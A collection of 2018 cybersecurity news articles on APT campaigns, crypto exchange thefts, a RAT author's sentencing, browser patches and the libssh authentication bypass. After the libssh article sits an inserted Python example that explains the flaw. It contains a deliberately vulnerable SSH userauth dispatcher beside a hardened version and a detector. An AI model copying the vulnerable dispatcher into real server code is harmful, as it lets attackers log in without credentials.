Law enforcement agencies targeted both sellers and users of the Luminosity Trojan. According to the NCA, a small crime ring in the UK distributed Luminosity RAT to more than 8,600 buyers across 78 countries.


Group-IB: 14 cyber attacks on crypto exchanges resulted in a loss of $882 million
20.10.2018 securityweek
Cryptocurrency

Group-IB has estimated that crypto exchanges suffered a total loss of $882 million due to targeted attacks between 2017 and 2018.
Group-IB, an international company that specializes in preventing cyber attacks, has estimated that cryptocurrency exchanges suffered a total loss of $882 million due to targeted attacks in 2017 and in the first three quarters of 2018. According to Group-IB experts, at least 14 crypto exchanges were hacked. Five attacks have been linked to North Korean hackers from the state-sponsored Lazarus group, including the infamous attack on the Japanese crypto exchange Coincheck, when $534 million in crypto was stolen.

This data was included in the annual Hi-Tech Crime Trends 2018 report, presented by Group-IB CTO Dmitry Volkov at the sixth international CyberCrimeCon conference. A separate report chapter is dedicated to the analysis of hackers’ and fraudsters’ activity in the crypto industry.

Crypto exchanges: in the footsteps of Lazarus

In most cases, cybercriminals, while attacking cryptocurrency exchanges, use traditional tools and methods, such as spear phishing, social engineering, distribution of malware, and website defacement. One successful attack could bring hackers tens of millions of dollars in crypto funds, whilst reducing the risks of being caught to a minimum: the anonymity of transactions allows cybercriminals to withdraw stolen funds without putting themselves at greater risk.

Spear phishing remains the major vector of attack on corporate networks. For instance, fraudsters deliver malware under the cover of CV spam: they send an email containing a fake CV with the subject line “Engineering Manager for Crypto Currency job” or the file “Investment Proposal.doc” as an attachment, with malware embedded in the document.

In the last year and a half, the North Korean state-sponsored Lazarus group attacked at least five cryptocurrency exchanges: Yapizon, Coins, YouBit, Bithumb, Coincheck. After the local network is successfully compromised, the hackers browse the local network to find workstations and servers used for working with private cryptocurrency wallets.

crypto exchanges

“Last year we warned that hackers competent enough to carry out a targeted attack might have a new target – cryptocurrency exchanges,” — reminded Dmitry Volkov, Group-IB CTO.

“In the last couple of years, crypto exchanges suffered many attacks. Some of the exchanges went bankrupt after the hacks, i.e. Bitcurex, YouBit, Bitgrail. At the beginning of 2018 hackers’ interest in cryptocurrency exchanges ramped up. The most likely cryptocurrency exchange attackers now are Silence, MoneyTaker, and Cobalt.”

ICO: more than 56% of funds were stolen through phishing attacks

Hackers cause serious damage to ICOs: they attack founders, community members, and platforms. In 2017 more than 10% of funds raised through ICOs were stolen, while 80% of projects disappeared with the money without fulfilling any obligations towards their investors.

Yet despite the pessimistic forecasts, the amount of funds invested in ICOs increased significantly. In H1 2018 alone, ICO projects raised almost $14 billion, which is twice as much as during the entire 2017 ($5.5 billion), according to CVA and PwC studies. Therefore, cybercriminals can steal more funds in one successful attack.

In 2018, hackers attacked ICOs conducting private funding rounds. For instance, cyber criminals targeted the TON project, founded by Pavel Durov, through phishing and managed to steal $35,000 in Ethereum. The worst generally happens on the first day of token sales: a set of DDoS attacks simultaneous with an influx of users, an eruption of Telegram and Slack messages, and mailing list spamming.

Phishing remains one of the major vectors of attacks on ICOs: approximately 56% of all funds stolen from ICOs were siphoned off as a result of phishing attacks. In the rush of “the crypto-fever” everyone is striving to purchase tokens, often sold at a significant discount, as fast as possible without paying attention to fine details such as fake domain names. One big phishing group is capable of stealing roughly $1 million a month.

Phishing attacks against ICO projects are not always aimed at stealing money. This year, there were several cases of investor database theft. This information can be later re-sold on the darknet or used for blackmail.

A relatively new method of fraud on the ICO market was stealing a White Paper of an ICO project and presenting an identical idea under a new brand name. Fraudsters build a website to feature a new brand and a new team using the stolen project description and announce an ICO.


Attackers behind Operation Oceansalt reuse code from Chinese Comment Crew
20.10.2018 securityweek
APT

Security researchers from McAfee have recently uncovered a cyber espionage campaign, tracked as Operation Oceansalt, targeting South Korea, the United States, and Canada.
The threat actors behind Operation Oceansalt are reusing malware previously associated with China-linked cyberespionage group APT1.

“McAfee Advanced Threat Research and Anti-Malware Operations teams have discovered another unknown data reconnaissance implant targeting Korean-speaking users.” reads the report.

“We have named this threat Operation Oceansalt based on its similarity to the earlier malware Seasalt, which is related to earlier Chinese hacking operations. Oceansalt reuses a portion of code from the Seasalt implant (circa 2010) that is linked to the Chinese hacking group Comment Crew. Oceansalt appears to have been part of an operation targeting South Korea, United States, and Canada in a well-focused attack.”

The APT1 cyberespionage group, aka Comment Crew, was first discovered in 2013 by experts from the Mandiant firm. The evidence collected by the security experts links APT1 to China’s 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department (Military Cover Designator 61398); experts believe the group has been active since 2006 and has targeted hundreds of organizations in multiple industries.

According to McAfee, Operation Oceansalt was not conducted by APT1; the attackers leverage the Oceansalt implant, which borrows code from the APT1 tool dubbed Seasalt.

Both malware families use a similar command handler and index table, and exactly the same response codes associated with command execution.

“Oceansalt contains the following strings that are part of Seasalt:

Upfileer
Upfileok
Both implants have a high degree of similarity in code sharing and functions. A few of their commonalities follow.”

According to the researchers, the implant is only a first-stage component that allows operators to perform various actions on the infected systems and to download additional components.

Oceansalt implements a dozen commands, including extracting drive information, sending information about a specific file, executing a command line using WinExec(), deleting a file, creating a file, getting information on the running processes, terminating a process, creating/operating/terminating a reverse shell, and testing receive and send capabilities.

Operation Oceansalt

At the time of the analysis, it was still unclear who was behind the campaign; the only certainty was that the attackers in some way have access to APT1’s source code, even though it was never publicly disclosed.

The Oceansalt implant was used in at least five campaigns and was customized to the specific targets.

In the first two waves of attacks, threat actors used spear-phishing emails with weaponized Korean-language Microsoft Excel documents to download the implant. In the third campaign hackers leveraged weaponized Microsoft Word documents, while the remaining waves of attacks targeted a small number of entities outside of South Korea, including the U.S. and Canada.

The attackers used several command and control (C&C) servers; the analysis revealed the Operation Oceansalt campaign is active in Canada, Costa Rica, the United States, and the Philippines.

“Perhaps more important is the possible return of a previously dormant threat actor and, further, why should this campaign occur now? Regardless of whether this is a false flag operation to suggest the rebirth of Comment Crew, the impact of the attack is unknown.” McAfee concludes.

“However, one thing is certain. Threat actors have a wealth of code available to leverage new campaigns, as previous research from the Advanced Threat Research team has revealed. In this case we see that collaboration not within a group but potentially with another threat actor—offering up considerably more malicious assets.”


NFCdrip Attack Proves Long-Range Data Exfiltration via NFC
19.10.2018 securityweek
Attack

Researchers have demonstrated that the near-field communication (NFC) protocol can be used to exfiltrate small amounts of data, such as passwords and encryption keys, over relatively long distances.

NFC enables two devices to communicate over distances of up to 10 cm (4 in). The system, present in most modern smartphones, is often used for making payments, sharing files, and authentication.

Pedro Umbelino, senior researcher at application security firm Checkmarx, has demonstrated that NFC can actually work over much longer distances and can be highly efficient for stealthily exfiltrating data from air-gapped devices that have other communication systems – such as Wi-Fi, Bluetooth and GSM – disabled.

The attack, dubbed NFCdrip, involves changing NFC operating modes to modulate data. In the case of Android, changing NFC operating modes does not require any special permissions, making the attack even easier to launch.

NFCdrip uses on-off keying (OOK), the simplest form of amplitude-shift keying (ASK) modulation, in which the presence of a carrier wave signals a “1” bit and the absence of a wave a “0” bit. The exfiltration of 8 bits is required to send out one character, but researchers typically also suggest the use of additional bits for error detection.

In his experiments, Umbelino showed how a piece of malware installed on an Android smartphone can be used to transmit a password over tens of meters to another Android phone that is connected to a simple AM radio.

The researcher showed that data can be transmitted over a distance of 2.5 m (8 ft) without any errors at a rate of 10-12 bits per second. The transfer rate is maintained at a distance of 10 m (32 ft), but some errors appear, although they are corrected. As the distance increases, the signal fades and the number of errors increases, but Umbelino did manage to transfer some data over a distance of more than 60 m (nearly 200 ft). He also managed to exfiltrate data through walls over a distance of 10 m.

The range can be extended significantly if an AM antenna and a software defined radio (SDR) dongle are used, the expert said.

Umbelino noted that the attack may even work on some devices when airplane mode is activated, and highlighted that this is not an Android-specific issue – NFCdrip attacks can be conducted on laptops and other types of devices as well.

Checkmarx plans on making the NFCdrip PoC application open source. In the meantime, several videos showing the experiments conducted by Umbelino and a Hack.lu talk discussing the findings have been made available.


'GreyEnergy' Cyberspies Target Ukraine, Poland
19.10.2018 securityweek
APT CyberSpy ICS

Over the past three years, ESET security researchers have been tracking a cyber-espionage group linked to the infamous BlackEnergy hackers.

BlackEnergy has been around since at least 2007, but rose to prominence in December 2015 when it caused a major blackout. The newly documented group, which ESET refers to as GreyEnergy, emerged around the same time.

Another group that emerged around the same time is TeleBots, which is said to have orchestrated the massive NotPetya outbreak last year. Recently, the security researchers managed to link the group to Industroyer, which is considered the most powerful modern malware targeting industrial control systems (ICS).

According to an ESET report published on Wednesday (PDF), the BlackEnergy threat actor evolved into two separate groups, namely TeleBots and GreyEnergy. The former is focused on launching cybersabotage attacks on Ukraine, through computer network attack (CNA) operations.

Over the past three years, GreyEnergy was observed being involved in attacks targeting entities in Ukraine and Poland, but mainly focused on cyber-espionage and reconnaissance. The group's operations have been aimed at the energy sector, transportation, and other high-value targets.

The GreyEnergy malware features a modular architecture, meaning that its capabilities are dependent on the modules the operator chooses to deploy. These modules, however, include backdoor, file extraction, screenshot capturing, keylogging, password and credential stealing, and other functionality.

“We have not observed any modules that specifically target Industrial Control Systems software or devices. We have, however, observed that GreyEnergy operators have been strategically targeting ICS control workstations running SCADA software and servers,” Anton Cherepanov, a senior security researcher at ESET, reveals.

None of the malware’s modules, ESET says, is capable of affecting ICS, but its operators did use, on at least one occasion, a disk-wiping component to disrupt operating processes. One of the GreyEnergy samples was using a valid digital certificate likely stolen from Taiwanese company Advantech.

The actor is targeting organizations either through compromised self-hosted web services or via spear-phishing emails with malicious attachments.

The attackers would also deploy additional backdoors to the compromised web servers that are accessible from the Internet. The hackers favor PHP backdoors and use several layers of obfuscation and encryption to hide the malicious code.

The attachments of spear-phishing emails would first drop a lightweight first-stage backdoor dubbed GreyEnergy mini (and also known as FELIXROOT) to map the network and collect admin credentials using tools such as Nmap and Mimikatz.

The collected credentials are then used to deploy the main GreyEnergy malware, which requires administrator privileges. The backdoor is deployed on servers with high uptime and workstations used to control ICS environments. Additional software (proxies deployed on internal servers) is used to communicate with the command and control (C&C) server as stealthily as possible.

Written in C and compiled using Visual Studio, the GreyEnergy malware is usually deployed in two modes: in-memory-only mode, when no persistence is required, and using Service DLL persistence, to survive system reboots. The functionality of the malware is the same in both cases.

The GreyEnergy modules researchers have observed to date are meant to inject a PE binary into a remote process; collect information about the system and event logs; perform file system operations; grab screenshots; harvest key strokes; collect saved passwords from various applications; use Mimikatz to steal Windows credentials; use Plink to create SSH tunnels; and use 3proxy to create proxies.

The malware leverages Tor relay software when active, with the C&C infrastructure set up similarly to that of BlackEnergy, TeleBots, and Industroyer. Furthermore, GreyEnergy and BlackEnergy have a similar design and a similar set of modules and features, although they are implemented differently.

Furthermore, ESET researchers discovered a worm that appears to be the predecessor of NotPetya, and which they call Moonraker Petya. The malware, which contains code that makes the computer unbootable, was deployed against a small number of organizations and has limited spreading capabilities.

Moonraker Petya shows a cooperation between TeleBots and GreyEnergy, or at least reveals they are sharing some ideas and code. The main difference between the two is that TeleBots focuses solely on Ukraine, while GreyEnergy operates outside the country’s borders as well.

“GreyEnergy is an important part of the arsenal of one of the most dangerous APT groups that has been terrorizing Ukraine for the past several years. We consider it to be the successor of the BlackEnergy toolkit. The main reasons for this conclusion are the similar malware design, specific choice of targeted victims, and modus operandi,” ESET concludes.


LuminosityLink RAT Author Sentenced to 30 Months in Prison
19.10.2018 securityweek
CyberCrime

The maker of the LuminosityLink remote access Trojan (RAT) was sentenced to 30 months in federal prison, the United States Department of Justice announced this week.

The man, Colton Grubbs, 21, of Stanford, Kentucky, admitted in court earlier this year to designing, marketing, and selling LuminosityLink, a piece of malware that could record keystrokes, access the camera and microphone for surveillance purposes, download files, and steal login credentials.

As part of his guilty plea, Grubbs also revealed that he was aware of the fact that some of his customers would use the software to remotely access and control computers without their owner's knowledge or consent.

The RAT was being sold via the luminosity[.]link and luminosityvpn[.]com websites, but the malware author suspended sales via luminosity[.]link in July 2017, half a year before law enforcement agencies released the details of an operation specifically targeting LuminosityLink users.

Grubbs, who admitted to selling the malicious program for $39.99 apiece to more than 6,000 customers, also provided assistance on the use of the RAT for unauthorized computer intrusions. The Trojan was used to target victims throughout the United States and around the world.

Under federal law, Grubbs must serve 85% of his prison sentence. He will be released under supervision of the United States Probation Office for a term of three years.

Grubbs has also been ordered to forfeit the proceeds of his crimes, including 114 Bitcoin (valued at over $725,000 at the moment), which was seized by the Federal Bureau of Investigation.

“Our modern society is dependent on computers, mobile devices, and the use of the internet. It is essential that we vigorously prosecute those who erode that confidence and illicitly gain access to computer systems and the electronic information of others. Everyone benefits when this deceitful conduct is discovered, investigated, and prosecuted,” Robert M. Duncan, Jr., United States Attorney for the Eastern District of Kentucky, said.


Chrome 70 Updates Sign-In Options, Patches 23 Flaws
19.10.2018 securityweek
Vulnerability

Google on Tuesday released Chrome 70 in the stable channel, with patches for nearly two dozen vulnerabilities, as well as with updated sign-in options.

Available for Windows, Mac and Linux as version 70.0.3538.67, the new Chrome iteration arrives with patches for 23 vulnerabilities, 18 of which were discovered by external researchers. These include 6 flaws rated high severity, 8 medium risk, and 4 low severity issues.

The addressed flaws include sandbox escape, remote code execution, heap buffer overflow, URL spoofing, use after free, memory corruption, cross-origin URL disclosure, security UI occlusion in full screen mode, iframe sandbox escape on iOS, and lack of limits on update() in ServiceWorker.

Google paid over $20,000 in bug bounty rewards to the reporting security researchers.

One other important update that Chrome 70 comes with is the final version of the Transport Layer Security (TLS) 1.3 traffic encryption protocol, which was approved earlier this year. In one year and a half, Chrome and all other major web browsers will no longer support TLS 1.0 and 1.1.

The browser now also provides users with increased control over Chrome sign-in options. The previous Chrome release would automatically sign users into the browser when they signed into a Google service, which raised privacy concerns.

In late September, Google revealed that Chrome’s sign-in behavior was meant to make it more obvious for users that they are logged into a specific account.

“You’ll see your Google Account picture right in the Chrome UI, so you can easily see your sign-in status. When you sign out, either directly from Chrome or from any Google website, you’re completely signed out of your Google Account,” Zach Koch, Chrome Product Manager, explained at the time.

One issue with the functionality, however, was that users had no control over it, and Google decided to change that.

Thus, Chrome 70 now provides users with the option to turn off the linking of web-based sign-in with browser-based sign-in. By default, the linking is turned on, but users can opt out, meaning they will no longer be signed into Chrome when signing into a Google service.

Now, Chrome is also making it clearer for users whether the syncing option is turned on, so that people know when their data is being sent to Google’s servers.


Libssh Vulnerability Exposes Servers to Attacks
19.10.2018 securityweek
Vulnerability

Servers using libssh to implement the Secure Shell (SSH) remote login protocol may be vulnerable to attacks due to the existence of an authentication bypass flaw discovered recently by a researcher.

Peter Winter-Smith, security consultant at NCC Group, found that versions 0.6 and later of libssh are affected by a flaw that can be exploited by an attacker to authenticate on a server without needing any credentials.

When authentication is initiated, the server expects an SSH2_MSG_USERAUTH_REQUEST message. However, Winter-Smith discovered that an attacker can trick the server into believing authentication was successful by sending it an SSH2_MSG_USERAUTH_SUCCESS message, which is normally only intended for communications from the server to the client.

The vulnerability, tracked as CVE-2018-10933, was patched on Tuesday with the release of libssh 0.8.4 and 0.7.6. The issue was reported to libssh developers on June 25.

An Internet scan conducted with the Shodan search engine shows over 6,300 servers using libssh, and a Censys scan reveals more than 3,300 servers. However, many of them may not be vulnerable to attacks leveraging CVE-2018-10933.

"Not all libSSH servers will necessarily be vulnerable to the authentication bypass," explained Winter-Smith. "Since the authentication bypass sets the internal libSSH state machine to authenticated without ever giving any registered authentication callbacks an opportunity to execute, servers developed using libSSH which maintain additional custom session state may fail to function correctly if a user is authenticated without this state being created."

Many users were concerned about the risk posed by the vulnerability, especially since libssh is also used by GitHub. However, GitHub clarified that while it applied the patches "out of an abundance of caution," the vulnerability did not affect its services due to how the library is used.

Experts also clarified that the vulnerability does not impact OpenSSH, libssh2, curl, or libcurl. Linux distributions are affected, but their developers should release patches in the upcoming period.

NCC Group has published a technical advisory for the vulnerability, which also includes proof-of-concept (PoC) code.

"It is important to note that the authentication bypass exploit detailed above is the most obvious route to exploitation for the overarching issue – the libSSH server state machine is vulnerable to being updated by messages intended only for handling on the client side," Winter-Smith clarified. "Even servers which are not vulnerable to the authentication bypass may still be vulnerable to other unexpected state manipulation issues, so it is imperative that all services built on top of libSSH are updated even if not demonstrated vulnerable to the authentication bypass."
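The state-machine weakness described in this article (the USERAUTH_SUCCESS message at the top and the broader "messages intended only for the client side" point in the quote above), modelled as an added example that is not libssh code: a toy server-side userauth dispatcher that switches on message number alone, beside a hardened one that validates message direction before touching state, plus a detector over a constructed connection trace. Message numbers are the RFC 4252 values; the credential check and the trace are constructed samples.

```python
"""Server-side SSH userauth state machine with a message-direction check.

Added example, not libssh code. It models the CVE-2018-10933 failure mode
on a tiny state machine: a server that dispatches on message number alone
treats a client-sent SSH2_MSG_USERAUTH_SUCCESS as a completed
authentication without ever running its authentication callback. The
hardened variant rejects any message the peer is not allowed to send in
its role. Message numbers are the RFC 4252 values.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SSH2_MSG_USERAUTH_REQUEST = 50   # client -> server
SSH2_MSG_USERAUTH_FAILURE = 51   # server -> client only
SSH2_MSG_USERAUTH_SUCCESS = 52   # server -> client only

# Userauth messages a server may legitimately receive from a client, and the
# ones that must never arrive from a client during userauth.
CLIENT_TO_SERVER = {SSH2_MSG_USERAUTH_REQUEST}
SERVER_ONLY = {SSH2_MSG_USERAUTH_FAILURE, SSH2_MSG_USERAUTH_SUCCESS}


@dataclass
class Session:
    authenticated: bool = False
    user: Optional[str] = None
    log: List[str] = field(default_factory=list)


def check_password(user, password) -> bool:
    """Constructed stand-in for the registered authentication callback."""
    return user == "alice" and password == "correct horse battery"


def dispatch_naive(session: Session, msg_type: int, payload: dict):
    """Vulnerable pattern: the handler table is keyed on message number only,
    so a SUCCESS message arriving from the client flips the state without
    any authentication callback having run."""
    if msg_type == SSH2_MSG_USERAUTH_REQUEST:
        ok = check_password(payload.get("user"), payload.get("password"))
        session.authenticated = ok
        session.user = payload.get("user") if ok else None
        return SSH2_MSG_USERAUTH_SUCCESS if ok else SSH2_MSG_USERAUTH_FAILURE
    if msg_type == SSH2_MSG_USERAUTH_SUCCESS:
        session.authenticated = True      # the bug: trusts a server-only message
        return None
    return None


def dispatch_hardened(session: Session, msg_type: int, payload: dict):
    """Fixed pattern: check that the message is one this role may receive,
    and only ever derive 'authenticated' from the callback's result."""
    if msg_type not in CLIENT_TO_SERVER:
        session.log.append("rejected server-only message %d from client" % msg_type)
        return SSH2_MSG_USERAUTH_FAILURE
    ok = check_password(payload.get("user"), payload.get("password"))
    session.authenticated = ok
    session.user = payload.get("user") if ok else None
    return SSH2_MSG_USERAUTH_SUCCESS if ok else SSH2_MSG_USERAUTH_FAILURE


def run(dispatch, messages: List[Tuple[int, dict]]) -> Session:
    """Feed (msg_type, payload) pairs to a dispatcher and return the session."""
    session = Session()
    for msg_type, payload in messages:
        dispatch(session, msg_type, payload)
    return session


# Constructed trace of decrypted SSH message numbers with their direction,
# as a monitoring hook or protocol-aware sensor might record them.
SAMPLE_TRACE = [("c2s", SSH2_MSG_USERAUTH_REQUEST),
                ("c2s", SSH2_MSG_USERAUTH_SUCCESS),   # should never happen
                ("s2c", SSH2_MSG_USERAUTH_FAILURE)]


def flag_misdirected(trace) -> List[int]:
    """Indices of trace records where a client sent a server-only message."""
    return [i for i, (direction, msg_type) in enumerate(trace)
            if direction == "c2s" and msg_type in SERVER_ONLY]


if __name__ == "__main__":
    bypass = [(SSH2_MSG_USERAUTH_SUCCESS, {})]
    print("naive   :", run(dispatch_naive, bypass).authenticated)     # True
    print("hardened:", run(dispatch_hardened, bypass).authenticated)  # False
    print("suspicious trace records:", flag_misdirected(SAMPLE_TRACE))
```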


Britain Leads Calls for EU Action Against Hackers
19.10.2018 securityweek
BigBrothers

British Prime Minister Theresa May will call on fellow EU leaders Thursday to take united action to punish cyber attackers, warning hackers cause economic harm and undermine democracies.

Britain is among eight European Union countries pushing for the bloc to urgently agree a new sanctions regime to address malign cyber activities.

"We should accelerate work on EU restrictive measures to respond to and deter cyber attacks, including a robust sanctions regime," May will say, according to pre-released comments.

She will add: "Malign cyber activity causes harm to our economies, and undermines our democracies.

"As well as protecting ourselves against attack, we must impose proportionate consequences on those who would do us harm."

The move comes amid growing concern at Russia's activities, with Western powers blaming Moscow for numerous acts of hacking and electronic interference.

This month the Netherlands revealed dramatic details of a bid by Russia's GRU military intelligence agency to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

This was "a stark example of the very real threats that we face", May will say, but also "a clear example of where these attacks can be prevented".

A confidential EU proposal seen by AFP and backed by Britain, Lithuania, Estonia, Latvia, Denmark, Finland, Romania and the Netherlands warns that "the pace of events has accelerated considerably".

The paper says it is "only a matter of time before we are hit by a critical operation with severe consequences on the EU".

Lithuania and the other Baltic states, Latvia and Estonia, say they come under near-daily cyber attacks, most originating in Russia, targeting everything from banks and government institutions to transport infrastructure.

Britain's National Cyber Security Centre (NCSC) revealed this week that it has dealt with more than 1,100 cyber incidents in the two years since it was set up, the majority carried out from within "hostile nation states".

May has repeatedly stressed that despite Britain leaving the EU in March, London wants the fullest possible security relationship with the bloc post-Brexit.

If approved, the EU sanctions regime would freeze assets held in the bloc by targeted individuals and ban them from travelling to the 28 member states.

But the proposal may face resistance from some EU members who want to improve relations with Russia, such as the new Italian government.


Ex-Equifax Manager Gets Home Confinement for Insider Trading
19.10.2018 securityweek
Crime

A former Equifax manager was sentenced Tuesday to serve eight months of home confinement for engaging in insider trading in the wake of the company’s massive data breach last year.

Sudhakar Reddy Bonthu, who worked as a software product development manager for the Atlanta-based credit-reporting agency, had pleaded guilty in July. U.S. District Judge Amy Totenberg also ordered Bonthu to pay a $50,000 fine, to serve 50 hours of community service and to forfeit the proceeds he gained from insider trading.

Born in Andhra Pradesh, India, Bonthu, 44, has lived in the United States since 2000. But he is not a U.S. citizen and faces possible deportation as a result of his felony conviction.

Hackers who haven’t been identified accessed Equifax databases without authorization from mid-May through July in 2017 and obtained customers’ personal information. Federal authorities say Equifax discovered the suspicious activity on its network on July 29, 2017.

The company ultimately revealed that the information of nearly 150 million Americans was exposed.

Bonthu and other Equifax employees were asked on Aug. 25, 2017, to help respond to the breach, but were told the work involved a potential Equifax customer, not Equifax itself, prosecutors have said.

Bonthu knew the target date for announcing the breach was Sept. 6. Bonthu used his wife’s brokerage account on Sept. 1 to buy 86 put options in Equifax stock that expired Sept. 15 for about $1,300, prosecutors said. Put options allow the holder to make a profit if the stock price drops.

After the share value plunged when the breach was publicly disclosed on Sept. 7, 2017, Bonthu exercised his put options and made a profit of about $75,000.

Bonthu also faced civil charges from the Securities and Exchange Commission and settled that case in July.

Another former Equifax employee also faces insider trading charges related to the breach. Jun Ying, former chief information officer of Equifax’s U.S. Information Solutions, was indicted in March. He has pleaded guilty and his case is pending. He also faces civil charges of insider trading from the SEC.

Equifax Chief Financial Officer John Gamble and three other executives sold shares worth a combined $1.8 million days after Equifax discovered suspicious activity on its network, but Equifax said an independent committee determined that these executives did not know of the breach when their trades were made.

Bonthu’s wife, addressing the judge during the sentencing hearing, questioned why her husband was being punished when top executives were not.

“He’s just a small fish in this whole game,” Rekha Vummadi said.

Bonthu also addressed the judge, saying he accepted responsibility for his actions and that he was sorry to Equifax stakeholders and to his family.

Totenberg said she had reviewed Bonthu’s history and read letters submitted by his family and former colleagues. Bonthu is clearly very intelligent and has contributed to his community and worked hard to build a good life for his family in this country, she said.

“I don’t know what got into you on this one occasion,” she said and speculated that Bonthu had suffered from the “infection of capitalism.”

Totenberg noted that perhaps the most serious consequence Bonthu faces — possible deportation — is something over which she has no control. With an eye toward potential immigration proceedings, she said for the record that she doesn’t see any evidence of moral turpitude, which can be grounds for deportation.


Tumblr Vulnerability Exposed User Account Information
19.10.2018 securityweek
Vulnerability

Tumblr on Wednesday disclosed a vulnerability that could have been exploited to obtain user account information, including email addresses and protected passwords.

According to the company, the flaw was related to the “Recommended Blogs” feature in the desktop version of Tumblr. The module shows logged-in users a list of blogs they may be interested in.

The security bug could have allowed an attacker to view account information associated with the blogs listed in the Recommended Blogs section by “using debugging software in a certain way.” Tumblr has not shared any other information on the vulnerability and how it could have been exploited.

The flaw exposed information such as name of the blog, email address, hashed and salted password of the Tumblr account, location, previously used email address, and last login IP.

“We’re not able to determine which specific accounts could have been affected by this bug, but our analysis has shown that the bug was rarely present,” Tumblr said.

The company claims a patch was implemented within 12 hours and there is no evidence that the vulnerability has been used for malicious purposes.

The vulnerability was reported by a researcher participating in the Oath bug bounty program, which also covers Tumblr. Oath, a Verizon subsidiary, is the umbrella company for Yahoo, AOL and other digital content services. Its bug bounty program has paid out over $1 million, with the highest offered rewards ranging between $10,000 and $15,000. It’s unclear how much the researcher earned for reporting the flaw disclosed by Tumblr this week.

“It’s our mission to provide a safe space for people to express themselves freely and form communities around things they love. We feel that this bug could have affected that experience. We want to be transparent with you about it. In our view, it’s simply the right thing to do,” the microblogging platform said.

This statement appears to be inspired by the backlash faced by Google recently for deciding not to immediately disclose a potentially critical API bug that exposed personal information from as many as 500,000 Google+ accounts. Google discovered the problem in March, but only notified users in October.

Back in 2016, Tumblr disclosed a breach affecting 65 million users who had registered accounts before early 2013.


Ex-Virginia Teacher Charged in 2014 'Celebgate' Hacking
19.10.2018 securityweek
Crime

A former Virginia high school teacher is the fifth person charged in an investigation into the 2014 "celebgate" scandal in which hackers obtained nude photographs and other private information from more than 200 people, including celebrities.

Documents filed in federal court show that Christopher Brannan, 30, a former teacher at Lee-Davis High School, has agreed to plead guilty to charges of aggravated identity theft and unauthorized access to a protected computer.

The case was originally filed in Los Angeles, but was transferred to Virginia, where Brannan lives.

Thom Mrozek, a spokesman for the U.S. Attorney's Office in Los Angeles, confirmed Wednesday that Brannan is charged in the "celebgate" investigation.

Mrozek would not release the names of the celebrities. But at the time, actress Jennifer Lawrence acknowledged that she was a victim of the hack.

Mrozek said prosecutors have linked Brannan to the hacking, but not to the leak of nude photographs in 2014.

Lawrence contacted authorities after naked photos of her began appearing online. Actress Mary Elizabeth Winstead also confirmed that nude photos of her were posted online.

Under a plea agreement, Brannan's lawyer and prosecutors will recommend a prison sentence of nearly three years. A hearing is scheduled Monday in Richmond.

A statement of facts filed with Brannan's plea agreement says that between August 2013 and October 2014, in Los Angeles County, Virginia and elsewhere, Brannan hacked into internet and email accounts, including Apple iCloud, Yahoo! and Facebook. He was then able to obtain iCloud backups, photographs and other private information belonging to the victims.

The statement said Brannan would gain access to victims' email accounts by researching their social media accounts to learn the answers to their security questions.

Brannan also admitted using fraudulent email addresses designed to look like Apple Inc. security accounts. The emails would ask the victims to provide their usernames and passwords to their internet accounts.

Because the emails appeared to be from Apple, the victims would provide the information. Brannan would then use it to access the victims' email accounts, where he obtained personal information, such as "sensitive and private photographs and videos."

Court documents do not include the names of the victims. A spokesman for prosecutors said the victims' names will not be released.

Brannan could not immediately be reached for comment. His lawyer, Abraham Del Rio III, did not respond to requests for comment.

Joshua Stueve, a spokesman for U.S. Attorney G. Zachary Terwilliger, said prosecutors will not release the names of the victims to protect their privacy.

Chris Whitley, a spokesman for Hanover County Public Schools, said Brannan worked at Lee-Davis High School in Mechanicsville, just outside Richmond, from August 2013 to June 2015.

Whitley told the Richmond Times-Dispatch that Brannan was immediately put on administrative leave in January 2015 after school officials were notified by the FBI of an investigation. He said school officials were not given details about the nature of the investigation.

Court documents say Brannan has also admitted hacking or trying to hack accounts of current and former teachers and students at the high school.


Facebook Launches 'War Room' to Combat Manipulation
19.10.2018 securityweek
Social

In Facebook's "War Room," a nondescript space adorned with American and Brazilian flags, a team of 20 people monitors computer screens for signs of suspicious activity.

The freshly launched unit at Facebook's Menlo Park headquarters in California is the nerve center for the fight against misinformation and manipulation of the largest social network by foreign actors trying to influence elections in the United States and elsewhere.

Inside, the walls have clocks showing the time in various regions of the US and Brazil, maps and TV screens showing CNN, Fox News and Twitter, and other monitors showing graphs of Facebook activity in real time.

Facebook, which has been blamed for doing too little to prevent misinformation efforts by Russia and others in the 2016 US election, now wants the world to know it is taking aggressive steps with initiatives like the war room.

"Our job is to detect ... anyone trying to manipulate the public debate," said Nathaniel Gleicher, a former White House cybersecurity policy director for the National Security Council who is now heading Facebook's cybersecurity policy.

"We work to find and remove these actors."

Facebook has been racing to get measures in place and began operating this nerve center -- with a hastily taped "WAR ROOM" sign on the glass door -- for the first round of the presidential vote in Brazil on October 7.

It didn't take long to find false information and rumors being spread which could have had an impact on voters in Brazil.

"On election day, we saw a spike in voter suppression (messages) saying the election was delayed due to protests. That was not a true story," said Samidh Chakrabarti, Facebook's head of civic engagement.

Chakrabarti said Facebook was able to remove these posts in a couple of hours before they went viral.

"It could have taken days."

Humans and machines

At the unveiling of the war room for a small group of journalists including AFP this week, a man in a gray pork pie hat kept his eyes glued to his screen where a Brazilian flag was attached.

He said nothing but his mission was obvious -- watching for any hints of interference with the second round of voting in Brazil on October 28.

The war room, which will ramp up activity for the November 6 midterm US elections, is the most concrete sign of Facebook's efforts to weed out misinformation.

Staffed with computer science and cybersecurity experts as well as legal specialists, the center is currently operating during peak times for the US and Brazil, with plans to eventually work 24/7.

The war room adds a human dimension to the artificial intelligence tools Facebook has already deployed to detect inauthentic or manipulative activity.

"Humans can adapt quickly to new threats," Gleicher said of the latest effort.

Chakrabarti said the new center is an important part of coordinating activity -- even for a company that has been built on remote communications among people in various parts of the world.

"There's no substitute to face-to-face interactions," he said.

The war room was activated just weeks ahead of the US vote, amid persistent fears of manipulation by Russia and other state entities, or of efforts to polarize or inflame tensions. The war room is part of stepped-up security announced by Facebook that will add some 20,000 employees.

"With elections we need people to detect and remove (false information) as quickly as possible," Chakrabarti said.

The human and computerized efforts to weed out bad information complement each other, according to Chakrabarti.

"If an anomaly is detected in an automated way, then a data scientist will investigate, will see if there is really a problem," he said.

The efforts are also coordinated with Facebook's fact-checking partners around the world including media organizations such as AFP and university experts.

Gleicher said the team will remain on high alert for any effort that could lead to false information going viral and potentially impacting the result of an election.

